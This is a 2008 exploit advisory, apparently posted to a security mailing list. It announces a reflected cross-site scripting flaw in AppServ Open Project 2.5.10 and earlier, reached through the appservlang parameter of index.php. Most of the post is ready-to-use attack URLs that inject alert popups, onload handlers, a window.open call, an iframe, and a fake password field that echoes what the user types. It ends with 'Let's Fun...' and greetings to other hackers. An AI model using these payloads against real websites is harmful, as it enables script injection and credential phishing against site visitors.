AppServ Open Project < = 2.5.10 Remote XSS Vulnerability

tan_prathan Tue, 20 May 2008 08:06:38 -0700

==========================================================


 AppServ Open Project < = 2.5.10 Remote XSS Vulnerability         

           

==========================================================



AUTHOR : CWH Underground

DATE   : 19 May 2008

SITE   : www.citec.us


#####################################################

 APPLICATION : AppServ Open Project  

 VERSION     : <= 2.5.10  

 VENDOR      : 
[url=http://www.appservnetwork.com]http://www.appservnetwork.com[/url]   

 DOWNLOAD    : 
[url=http://sourceforge.net/project/showfiles.php?group_id=37459]http://sourceforge.net/project/showfiles.php?group_id=37459[/url]

#####################################################



DORK: N/A


---Exploit---

        

 [-] http://[target]/index.php?appservlang=";>[XSS]


=Example=


Alert:

 [-] http://[target]/index.php?appservlang=";><IMG%20SRC=java 
script:alert(/XSS/)>

 [-] http://[target]/index.php?appservlang=";><BODY%20ONLOAD=alert(/xss/)>


Open Window

 [-] 
http://[target]/index.php?appservlang=";><script>window.open(/phpinfo.php/)</script>

 [-] http://[target]/index.php?appservlang=";><INPUT%20TYPE="xss">


Iframe & Fake Login

 [-] 
http://[target]/index.php?appservlang=";><iframe%20src=http://www.google.com>

 [-] 
http://[target]/index.php?appservlang=";><BR><input%20type%20=%20"password"%20name="pass"/><button%20onClick="java
 
script:alert(/I%20have%20your%20password:%20/%20+%20pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>



Let's Fun...


##################################################################

  Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   

##################################################################

AppServ Open Project < = 2.5.10 Remote XSS Vulnerability

Reply via email to